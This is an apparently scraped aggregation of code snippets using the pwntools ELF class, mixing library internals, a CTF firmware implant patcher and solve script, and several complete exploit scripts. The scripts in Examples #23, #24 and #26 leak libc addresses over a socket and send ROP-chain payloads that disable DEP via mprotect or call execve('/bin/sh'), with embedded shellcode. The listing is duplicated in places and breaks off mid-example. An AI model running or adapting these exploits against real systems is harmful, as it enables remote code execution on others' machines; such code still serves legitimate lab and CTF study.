Example #1
0
    def libc(self):
        """libc(self) -> ELF

        Leak the Build ID of the remote libc.so, download the file,
        and load an ``ELF`` object with the correct base address.

        Returns:
            An ELF object, or None.
        """
        libc = 'libc.so'

        with self.waitfor('Downloading libc'):
            dynlib = self._dynamic_load_dynelf(libc)

            self.status("Trying lookup based on Build ID")
            build_id = dynlib._lookup_build_id(libc)

            if not build_id:
                return None

            self.status("Trying lookup based on Build ID: %s" % build_id)
            path = libcdb.search_by_build_id(build_id)

            if not path:
                return None

            libc = ELF(path)
            libc.address = dynlib.libbase
            return libc
Example #2
0
    def libc(self):
        """libc(self) -> ELF

        Leak the Build ID of the remote libc.so, download the file,
        and load an ``ELF`` object with the correct base address.

        Returns:
            An ELF object, or None.
        """
        libc = 'libc.so'

        with self.waitfor('Downloading libc'):
            dynlib = self._dynamic_load_dynelf(libc)

            self.status("Trying lookup based on Build ID")
            build_id = dynlib._lookup_build_id(libc)

            if not build_id:
                return None

            self.status("Trying lookup based on Build ID: %s" % build_id)
            path = libcdb.search_by_build_id(build_id)

            if not path:
                return None

            libc = ELF(path)
            libc.address = dynlib.libbase
            return libc
def findOffsets():
    File = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
    f = ELF(File)
    BaseAddr = f.symbols['PKTMGR_OutputTelemetry']
    print("PKTMGR_OutputTelemetry @ %08x" % BaseAddr)
    searchPattern = unhexlify("8b8344010000" + "8db0fa010000")
    addr = BaseAddr + 0xF0
    while True:
        target = f.read(addr, len(searchPattern))
        if searchPattern == target:
            break
        addr += 1
    addr += 5 + len(searchPattern)
    while True:
        target = f.read(addr, 1)
        if target == b'\x8b':
            break
        addr += 1
    movAddr = addr
    searchPattern = unhexlify("8d8b48010000" + "51" + "6a00" + "52")
    while True:
        target = f.read(addr, len(searchPattern))
        if searchPattern == target:
            break
        addr += 1
    addr += len(searchPattern)
    patchOffset = addr

    return (movAddr, patchOffset - BaseAddr)
Example #4
0
def patch_old(f, data):

    # Work in patch, it's stuck at the end of the file to avoid messing

    with open(f, 'rb') as fd:
        raw = fd.read()

    e = ELF(f)
    sections_start = e.symbols["sections"]
    sections_end = sections_start

    raw_text_h_start = e.header.e_ehsize
    print(".text Header @ %08x" % raw_text_h_start)

    raw_text_start = unpack(">I",
                            raw[raw_text_h_start + 4:raw_text_h_start + 8])[0]
    text_size, text_size_mesz = unpack(
        ">II", raw[raw_text_h_start + 0x10:raw_text_h_start + 0x18])
    print("Original .text offset,size: %08x %x,%x" %
          (raw_text_start, text_size, text_size_mesz))

    implant_addr = raw_text_start + text_size
    print("Writing Implant @ %08x" % implant_addr)
    raw = raw[:implant_addr] + data + raw[implant_addr + len(data):]

    print("Updating size of .text to %x" % (text_size + len(data)))

    raw = raw[:raw_text_h_start + 0x10] + 2 * pack(
        ">I",
        len(data) + text_size) + raw[raw_text_h_start + 0x18:]

    first_free = 0
    print("Section start: %08x" % sections_start)
    while True:
        section = e.read(sections_end, 16 + 4 * 4)
        paddr, raddr, plen, comp = unpack(">IIII", section[:4 * 4])
        name = section[4 * 4:]
        name = name[:name.index(b'\x00')]
        if paddr == 0 and raddr == 0:
            break
        print("Section %s @ %08x:%08x" % (name, paddr, paddr + plen))
        first_free = paddr + plen
        sections_end += 16 + 4 * 4

    first_free = (first_free + 0xFFFF) & ~(0xFFFF)
    print("First free, rounded: %x" % first_free)

    patch = pack(">IIII", first_free, implant_addr, len(data),
                 0) + b".challenge"
    print("Sections end: %08x" % sections_end)
    raw = raw[:sections_end +
              raw_text_start] + patch + raw[sections_end + raw_text_start +
                                            len(patch):]

    with open("build/patched_" + f, "wb") as fd:
        fd.write(raw)
def findGoalPatch(movAddr):
    File = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
    f = ELF(File)

    movInstr = f.read(movAddr, 6)

    print("Mov Instruction", hexlify(movInstr))

    patch = b"\x8b\x95" + movInstr[2:4]
    #patch = patch[::-1]
    print("Patch", hexlify(patch))
    return patch
Example #6
0
def main():
    a = p.parse_args()

    if not a.offset.startswith('0x'):
        a.offset = '0x' + a.offset

    offset = int(a.offset, 16)
    bytes  = unhex(a.bytes)
    elf    = ELF(a.elf)

    elf.write(offset, bytes)
    sys.stdout.write(elf.get_data())
Example #7
0
def main():
    a = p.parse_args()

    if not a.offset.startswith('0x'):
        a.offset = '0x' + a.offset

    offset = int(a.offset, 16)
    bytes  = unhex(a.bytes)
    elf    = ELF(a.elf)

    elf.write(offset, bytes)
    sys.stdout.write(elf.get_data())
Example #8
0
    def libc(self):
        """libc() -> ELF

        Returns an ELF for the libc for the current process.
        If possible, it is adjusted to the correct address
        automatically.
        """
        from pwnlib.elf import ELF

        for lib, address in self.libs().items():
            if 'libc.so' in lib:
                e = ELF(lib)
                e.address = address
                return e
Example #9
0
    def libc(self):
        """libc() -> ELF

        Returns an ELF for the libc for the current process.
        If possible, it is adjusted to the correct address
        automatically.
        """
        from pwnlib.elf import ELF

        for lib, address in self.libs().items():
            if 'libc.so' in lib or 'libc-' in lib:
                e = ELF(lib)
                e.address = address
                return e
    def binary(self, binary):
        """
        Infer target architecture, bit-with, and endianness from a binary file.
        Data type is a :class:`pwnlib.elf.ELF` object.

        Examples:

            >>> context.clear()
            >>> context.arch, context.bits
            ('i386', 32)
            >>> context.binary = '/bin/bash'
            >>> context.arch, context.bits
            ('amd64', 64)
            >>> context.binary
            ELF('/bin/bash')

        """
        # Cyclic imports... sorry Idolf.
        from pwnlib.elf import ELF

        if not isinstance(binary, ELF):
            binary = ELF(binary)

        self.arch = binary.arch
        self.bits = binary.bits
        self.endian = binary.endian
        self.os = binary.os

        return binary
Example #11
0
    def __init__(self, elfs, base=None, badchars=b'', **kwargs):
        """
        Arguments:
            elfs(list): List of :class:`.ELF` objects for mining
            base(int): Stack address where the first byte of the ROP chain lies, if known.
            badchars(str): Characters which should not appear in ROP gadget addresses.
        """
        import ropgadget

        # Permit singular ROP(elf) vs ROP([elf])
        if isinstance(elfs, ELF):
            elfs = [elfs]
        elif isinstance(elfs, (bytes, six.text_type)):
            elfs = [ELF(elfs)]

        #: List of individual ROP gadgets, ROP calls, SROP frames, etc.
        #: This is intended to be the highest-level abstraction that we can muster.
        self._chain = []

        #: List of ELF files which are available for mining gadgets
        self.elfs = elfs

        #: Stack address where the first byte of the ROP chain lies, if known.
        self.base = base

        #: Whether or not the ROP chain directly sets the stack pointer to a value
        #: which is not contiguous
        self.migrated = False

        #: Characters which should not appear in ROP gadget addresses.
        self._badchars = set(badchars)

        self.__load()
Example #12
0
    def __on_enoexec(self, exception):
        """We received an 'exec format' error (ENOEXEC)

        This implies that the user tried to execute e.g.
        an ARM binary on a non-ARM system, and does not have
        binfmt helpers installed for QEMU.
        """
        # Get the ELF binary for the target executable
        with context.quiet:
            # XXX: Cyclic imports :(
            from pwnlib.elf import ELF
            binary = ELF(self.executable)

        # If we're on macOS, this will never work.  Bail now.
        # if platform.mac_ver()[0]:
            # self.error("Cannot run ELF binaries on macOS")

        # Determine what architecture the binary is, and find the
        # appropriate qemu binary to run it.
        qemu = get_qemu_user(arch=binary.arch)
        qemu = which(qemu)
        if qemu:
            self._qemu = qemu

            args = [qemu]
            if self.argv:
                args += ['-0', self.argv[0]]
            args += ['--']

            return [args, qemu]

        # If we get here, we couldn't run the binary directly, and
        # we don't have a qemu which can run it.
        self.exception(exception)
Example #13
0
def unstrip_libc(filename):
    """
    Given a path to a libc binary, attempt to download matching debug info
    and add them back to the given binary.

    This modifies the given file.

    Arguments:
        filename(str):
            Path to the libc binary to unstrip.

    Returns:
        :const:`True` if binary was unstripped, :const:`False` otherwise.

    Examples:
        >>> filename = search_by_build_id('2d1c5e0b85cb06ff47fa6fa088ec22cb6e06074e', unstrip=False)
        >>> libc = ELF(filename)
        >>> hex(libc.symbols.read)
        '0xe56c0'
        >>> 'main_arena' in libc.symbols
        False
        >>> unstrip_libc(filename)
        True
        >>> libc = ELF(filename)
        >>> hex(libc.symbols.main_arena)
        '0x1d57a0'
        >>> unstrip_libc(which('python'))
        False
        >>> filename = search_by_build_id('06a8004be6e10c4aeabbe0db74423ace392a2d6b', unstrip=True)
        >>> 'main_arena' in ELF(filename).symbols
        True
    """
    if not which('eu-unstrip'):
        log.warn_once('Couldn\'t find "eu-unstrip" in PATH. Install elfutils first.')
        return False

    libc = ELF(filename, checksec=False)
    if not libc.buildid:
        log.warn_once('Given libc does not have a buildid. Cannot look for debuginfo to unstrip.')
        return False

    for server_url in DEBUGINFOD_SERVERS:
        libc_dbg = _search_debuginfo_by_hash(server_url, enhex(libc.buildid))
        if libc_dbg:
            break
    else:
        log.warn_once('Couldn\'t find debug info for libc with build_id %s on any debuginfod server.', enhex(libc.buildid))
        return False

    # Add debug info to given libc binary inplace.
    p = process(['eu-unstrip', '-o', filename, filename, libc_dbg])
    output = p.recvall()
    p.close()

    if output:
        log.error('Failed to unstrip libc binary: %s', output)
        return False

    return True
Example #14
0
    def _find_linkmap_assisted(self, path):
        """Uses an ELF file to assist in finding the link_map.
        """
        if isinstance(path, ELF):
            path = path.path

        # Load a fresh copy of the ELF
        with context.local(log_level='error'):
            elf = ELF(path)
        elf.address = self.libbase

        w = self.waitfor("Loading from %r" % elf.path)

        # Save our real leaker
        real_leak = self.leak

        # Create a fake leaker which just leaks out of the 'loaded' ELF
        # However, we may load things which are outside of the ELF (e.g.
        # the linkmap or GOT) so we need to fall back on the real leak.
        @MemLeak
        def fake_leak(address):
            try:
                return elf.read(address, 4)
            except ValueError:
                return real_leak.b(address)

        # Save off our real leaker, use the fake leaker
        self.leak = fake_leak

        # Get useful pointers for resolving the linkmap faster
        w.status("Searching for DT_PLTGOT")
        pltgot = self._find_dt(constants.DT_PLTGOT)

        w.status("Searching for DT_DEBUG")
        debug = self._find_dt(constants.DT_DEBUG)

        # Restore the real leaker
        self.leak = real_leak

        # Find the linkmap using the helper pointers
        self._find_linkmap(pltgot, debug)
        self.success('Done')
Example #15
0
    def _find_linkmap_assisted(self, path):
        """Uses an ELF file to assist in finding the link_map.
        """
        if isinstance(path, ELF):
            path = path.path

        # Load a fresh copy of the ELF
        with context.local(log_level='error'):
            elf = ELF(path)
        elf.address = self.libbase

        w = self.waitfor("Loading from %r" % elf.path)

        # Save our real leaker
        real_leak = self.leak

        # Create a fake leaker which just leaks out of the 'loaded' ELF
        # However, we may load things which are outside of the ELF (e.g.
        # the linkmap or GOT) so we need to fall back on the real leak.
        @MemLeak
        def fake_leak(address):
            try:
                return elf.read(address, 4)
            except ValueError:
                return real_leak.b(address)

        # Save off our real leaker, use the fake leaker
        self.leak = fake_leak

        # Get useful pointers for resolving the linkmap faster
        w.status("Searching for DT_PLTGOT")
        pltgot = self._find_dt(constants.DT_PLTGOT)

        w.status("Searching for DT_DEBUG")
        debug  = self._find_dt(constants.DT_DEBUG)

        # Restore the real leaker
        self.leak = real_leak

        # Find the linkmap using the helper pointers
        self._find_linkmap(pltgot, debug)
        self.success('Done')
Example #16
0
    def libc(self):
        """libc() -> ELF

        Returns an ELF for the libc for the current process.
        If possible, it is adjusted to the correct address
        automatically.

        Example:

        >>> p = process("/bin/cat")
        >>> libc = p.libc
        >>> libc # doctest: +SKIP
        ELF('/lib64/libc-...so')
        >>> p.close()
        """
        from pwnlib.elf import ELF

        for lib, address in self.libs().items():
            if 'libc.so' in lib or 'libc-' in lib:
                e = ELF(lib)
                e.address = address
                return e
Example #17
0
def patch(f, implant_elf, implant):
    e = ELF(f)

    sections_base_addr = e.symbols["sections"]
    implant_section_num = 3  # base 0
    section_patch_addr = sections_base_addr + implant_section_num * 0x20

    implant_prom_addr = 0x00220000
    implant_prom_len = len(implant)
    implant_load_addr = 0x42800000
    implant_section_flags = 0  # Not Compressed
    section_patch = pack(">IIII", implant_load_addr, implant_prom_addr,
                         implant_prom_len, implant_section_flags)
    section_patch = section_patch + b".challenge"

    # Patch in Implant
    patch_file(implant, implant_prom_addr)

    # Patch Sections
    e.write(section_patch_addr, section_patch)
    patch_file(section_patch, section_patch_addr)

    # Patch Entry Point
    e.write(e.symbols["_entry"], pack(">I", implant_load_addr))

    patch_file(pack(">I", implant_load_addr), e.symbols["_entry"])

    e.save(f + ".patched")

    with open(implant_elf, "r+b") as f:
        data = f.read()

    #data = re.sub(b'\x42\x80', b'\x00,\x22', data)
    #data = re.sub(b'\x42\x7f', b'\x00,\x21', data)
    #data = re.sub(b'\x42\x81', b'\x00,\x23', data)

    with open(implant_elf, 'wb') as f:
        f.write(data[:0x18])
        f.write(pack(">I", implant_prom_addr))
        f.write(data[0x1c:0x3c])
        f.write(pack(">II", 0x00210000, 0x00210000))
        f.write(data[0x44:0x5c])
        f.write(pack(">H", 0x0023))
        f.write(data[0x5e:0x60])
        f.write(pack(">H", 0x0023))
        f.write(data[0x62:])
Example #18
0
    def __init__(self, elfs, base=None, **kwargs):
        """
        Arguments:
            elfs(list): List of :class:`.ELF` objects for mining
        """
        import ropgadget

        # Permit singular ROP(elf) vs ROP([elf])
        if isinstance(elfs, ELF):
            elfs = [elfs]
        elif isinstance(elfs, (str, unicode)):
            elfs = [ELF(elfs)]
        self.elfs = elfs
        self._chain = []
        self.base = base
        self.migrated = False
        self.__load()
Example #19
0
def run_shellcode(bytes, **kw):
    """Given assembled machine code bytes, execute them.

    Example:

        >>> bytes = asm('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
        >>> p = run_shellcode(bytes)
        >>> p.wait_for_close()
        >>> p.poll()
        3

        >>> bytes = asm('mov r0, #12; mov r7, #1; svc #0', arch='arm')
        >>> p = run_shellcode(bytes, arch='arm')
        >>> p.wait_for_close()
        >>> p.poll()
        12
    """
    return ELF.from_bytes(bytes, **kw).process()
Example #20
0
def run_shellcode(bytes, **kw):
    """Given assembled machine code bytes, execute them.

    Example:

        >>> bytes = asm('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
        >>> p = run_shellcode(bytes)
        >>> p.wait_for_close()
        >>> p.poll()
        3

        >>> bytes = asm('mov r0, #12; mov r7, #1; svc #0', arch='arm')
        >>> p = run_shellcode(bytes, arch='arm')
        >>> p.wait_for_close()
        >>> p.poll()
        12
    """
    return ELF.from_bytes(bytes, **kw).process()
Example #21
0
def run_assembly(assembly):
    """
    Given an assembly listing, assemble and execute it.

    Returns:

        A :class:`pwnlib.tubes.process.process` tube to interact with the process.

    Example:

        >>> p = run_assembly('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
        >>> p.wait_for_close()
        >>> p.poll()
        3

        >>> p = run_assembly('mov r0, #12; mov r7, #1; svc #0', arch='arm')
        >>> p.wait_for_close()
        >>> p.poll()
        12
    """
    return ELF.from_assembly(assembly).process()
Example #22
0
def run_assembly(assembly):
    """
    Given an assembly listing, assemble and execute it.

    Returns:

        A :class:`pwnlib.tubes.process.process` tube to interact with the process.

    Example:

        >>> p = run_assembly('mov ebx, 3; mov eax, SYS_exit; int 0x80;')
        >>> p.wait_for_close()
        >>> p.poll()
        3

        >>> p = run_assembly('mov r0, #12; mov r7, #1; svc #0', arch='arm')
        >>> p.wait_for_close()
        >>> p.poll()
        12
    """
    return ELF.from_assembly(assembly).process()
Example #23
0
File: run.py Project: Readm/VRL
    def run(self):
      if self.options['static'] == 'False':
        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.options['dIP'], int(self.options['port'])))

        #get new sysaddress here
        s.send('a')      
        recv_data = s.recv(16)
        self.property['sysaddress'] = int(recv_data,16)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        print "sysaddress = " + hex(self.property['sysaddress'])
        
        #get rbp
        s.send('b')        
        recv_data1 = s.recv(16) 
        rbpvalue= int(recv_data1,16)
        print "rbpvalue = " + hex(rbpvalue)

        #get shellcode address
        self.property['shellcodeaddress'] = rbpvalue + 112

        #get /bin/sh offset
        binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
        print "binsh_addr_offset = " + hex(binsh_addr_offset)
      
        #get ret offset
        pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
        pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
        pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
        pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
       

        #get /bin/sh address
        binsh_addr = self.property['sysaddress'] + binsh_addr_offset

        #get ret address
        pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
        pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
        pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
        pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset

        pagenum=self.property['data2'] * 3
        print pagenum

       #print helloworld
        shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
        shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
        shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
        shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
        shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
        shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
       #shell
        shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
    


       
        #set payload rop shut off dep
        payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload
        print "\n##########sending payload to shut off dep ##########\n"
        s.send(payload)
        s.close()
      else:
        self.property = {'ret1':0x0000000000401696, #gadget address
                         'ret2':0x0000000000442fe9 ,
                         'ret3':0x00000000004c26e8 ,
                         'ret4':0x0000000000467685 ,
                         'pageaddress':0x7fffffffd000,
                         'shellcodeaddress':0x0,#shellcode address in stack
                         'data1':0x0000000000000007,# PROT_EXEC  The memory can be executed.
                         'data2':0x0000000000001000,# 4096 pagesize
                         'data3':0x000000000000000a,  #mprotect systemcall number, mprotect()  changes protection for the calling process's memory page(s)  
                         'data4':0x000000000000003b,#execv systemcall number    
                         'data5':0x0000000000000000,              
                         'offset':24, # offset 
                         'sysaddress':0x0} # system function address, initialize 0

        self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.options['dIP'], int(self.options['port'])))

        libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic_stacknoexe')

        #get  sysaddress here
        self.property['sysaddress'] = libc.symbols['system']
        print "sysaddress = " + hex(self.property['sysaddress'])
        
        #get rbp
        s.send('b')        
        recv_data1 = s.recv(16) 
        rbpvalue= int(recv_data1,16)
        print "rbpvalue = " + hex(rbpvalue)

        #get shellcode address
        self.property['shellcodeaddress'] = rbpvalue + 112

        #get /bin/sh address
        binsh_addr = next(libc.search('/bin/sh'))
      
        #get ret offset
        pop_ret1_addr = self.property['ret1']
        pop_ret2_addr = self.property['ret2']
        pop_ret3_addr = self.property['ret3']
        pop_ret4_addr = self.property['ret4']
       



       

        pagenum=self.property['data2'] * 3
        print pagenum

       #print helloworld
        shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
        shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
        shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
        shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
        shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
        shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
       #shell
        #shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
      


       
        #set payload rop shut off dep
        payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + shellcode
        print "\n##########sending payload to shut off dep ##########\n"
        s.send(payload)
        s.close()
Example #24
0
    def run(self):
      if self.options['static'] == 'False':
        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.options['dIP'], int(self.options['port'])))

        #get new sysaddress here
        s.send('a')      
        recv_data = s.recv(16)
        self.property['sysaddress'] = int(recv_data,16)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        print "sysaddress = " + hex(self.property['sysaddress'])
        
        #get rbp
        s.send('b')        
        recv_data1 = s.recv(16) 
        rbpvalue= int(recv_data1,16)
        print "rbpvalue = " + hex(rbpvalue)

        #get shellcode address
        self.property['shellcodeaddress'] = rbpvalue + 96

        #get /bin/sh offset
        binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
        print "binsh_addr_offset = " + hex(binsh_addr_offset)
      
        #get ret offset
        pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
        pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
        
       

        #get /bin/sh address
        binsh_addr = self.property['sysaddress'] + binsh_addr_offset

        #get ret address
        pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
        pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
        pop_ret3_addr = self.property['ret3']

        pagenum=self.property['data2'] * 3
        print pagenum

       #print helloworld
        shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
        shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
        shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
        shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
        shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
        shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
       #shell
        shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
    


       
        #set payload rop shut off dep
        payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload
        print "\n##########sending payload to shut off dep ##########\n"
        s.send(payload)
        s.close()
      else:
        print 'no exit static'
Example #25
0
#!/usr/bin/env python3
import argparse
import binascii
import socket
import sys

from pwnlib.elf import ELF

parser = argparse.ArgumentParser(description="solve script for 'read_it'")
parser.add_argument('--host', default="challenge", help="the host for the instance")
parser.add_argument('--port', type=int, default=5000, help="the port of the instance")
args = parser.parse_args()

elf = ELF('read_it')

key = elf.string(elf.symbols["key"])
secret1 = elf.string(elf.symbols["secret1"])
secret2 = elf.string(elf.symbols["secret2"])
print("key:    ", key.decode())
print("secret1:", secret1.decode())
print("secret2:", secret2.decode())

def encode_first(data):
    r = bytearray()
    for i in range(0, 16):
        r.append(data[i] ^ 0x17)
    return r

def encode_second(data):
    k = ""
    for i in range(0, 16):
Example #26
0
File: run.py Project: Readm/VRL
    def run(self):
        if self.options['architecture'] == 'amd64':
            if self.options['static'] == 'False':
                '''Run your exploit here, if this script could success, the VRL can run it.
                When the exploit run, follow the options.'''
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.options['dIP'], int(self.options['port'])))
                self.property = {'ret1': 0x0000000000021102,  # gadget address in libc
                                 'ret2': 0x000000000008ae95,
                                 'ret3': 0x000000000003a718,
                                 'ret4': 0x0000000000114809,
                                 'ret5': 0x00000000000bb945,
                                 'data1': 0x000000000000003b,  # execv systemcall number
                                 'data2': 0x0000000000000000,
                                 'data3': 0x0000000000000000,
                                 'offset': 40,  # offset
                                 'sysaddress': 0x0}  # system function address, initialize 0

                # get new sysaddress here
                s.send("a")  # any string
                recv_data = s.recv(16)
                self.property['sysaddress'] = int(recv_data, 16)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
                print "sysaddress = " + hex(self.property['sysaddress'])

                # get /bin/sh offset
                binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
                print "binsh_addr_offset = " + hex(binsh_addr_offset)

                # get ret offset
                pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
                pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
                pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
                pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
                pop_ret5_offset = self.property['ret5'] - libc.symbols['system']

                # get /bin/sh address
                binsh_addr = self.property['sysaddress'] + binsh_addr_offset

                # get ret address
                pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
                pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
                pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
                pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
                pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
                # pop_ret5_addr =pop_ret4_addr - 2

                # set payload
                payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
                    pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
                    self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)

                print "\n##########sending payload##########\n"
                s.send(payload)
                s.close()
            else:
                self.property = {'ret1': 0x0000000000401696,  # gadget address in libc
                                 'ret2': 0x00000000004264af,
                                 'ret3': 0x00000000004c26e8,
                                 'ret4': 0x0000000000442fe9,
                                 'ret5': 0x0000000000467685,
                                 'data1': 0x000000000000003b,  # execv systemcall number
                                 'data2': 0x0000000000000000,
                                 'data3': 0x0000000000000000,
                                 'offset': 24,  # offset
                                 'sysaddress': 0x0}  # system function address, initialize 0

                self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'

                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.options['dIP'], int(self.options['port'])))

                libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')

                # get  sysaddress here
                self.property['sysaddress'] = libc.symbols['system']
                print "sysaddress = " + hex(self.property['sysaddress'])

                # get /bin/sh address
                binsh_addr = next(libc.search('/bin/sh'))

                # get ret address
                pop_ret1_addr = self.property['ret1']
                pop_ret2_addr = self.property['ret2']
                pop_ret3_addr = self.property['ret3']
                pop_ret4_addr = self.property['ret4']
                pop_ret5_addr = self.property['ret5']

                # set payload
                payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
                    pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
                    self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)

                print "\n##########sending payload##########\n"
                s.send(payload)
                s.close()
        elif self.options['architecture'] == 'i386':

            if self.options['static'] == 'False':
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.options['dIP'], int(self.options['port'])))
                self.property = {'ret1': 0x00018395,  # gadget address in libc  : pop ebx ; ret
                                 'ret2': 0x0002c5dc,  # : xor eax, eax ; ret
                                 'ret3': 0x00023f97,  # : pop eax ; ret
                                 'ret4': 0x0002baab,  # : pop ecx ; pop edx ; ret
                                 'ret5': 0x00002c87,  # : int 0x80
                                 'data1': 0x0000000b,  # execv systemcall number
                                 'data2': 0x00000000,
                                 'data3': 0x00000000,
                                 'offset': 26,  # offset
                                 'sysaddress': 0x0}  # system function address, initialize 0

                # get new sysaddress here
                s.send("a")  # any string
                recv_data = s.recv(8)
                self.property['sysaddress'] = int(recv_data, 16)
                libc = ELF('/lib32/libc.so.6')
                print "sysaddress = " + hex(self.property['sysaddress'])

                # get /bin/sh offset
                binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
                print "binsh_addr_offset = " + hex(binsh_addr_offset)

                # get ret offset
                pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
                pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
                pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
                pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
                pop_ret5_offset = self.property['ret5'] - libc.symbols['system']

                # get /bin/sh address
                binsh_addr = self.property['sysaddress'] + binsh_addr_offset

                # get ret address
                pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
                pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
                pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
                pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
                pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
                # pop_ret5_addr =pop_ret4_addr - 2

                # set payload
                payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
                    pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
                    self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr)

                print "\n##########sending payload##########\n"
                s.send(payload)
                s.close()
            else:
                self.property = {'ret1': 0x080481d1,  # : pop ebx ; ret
                                 'ret2': 0x080494e3,  # : xor eax, eax ; ret
                                 'ret3': 0x080b95b6,  # : pop eax ; ret
                                 'ret4': 0x080e0859,  # : pop ecx ; ret
                                 'ret5': 0x0807079a,  # : pop edx ; ret
                                 'ret6': 0x0806e127,  # : int 0x80
                                 'data1': 0x0000000b,  # execv systemcall number
                                 'data2': 0x00000000,
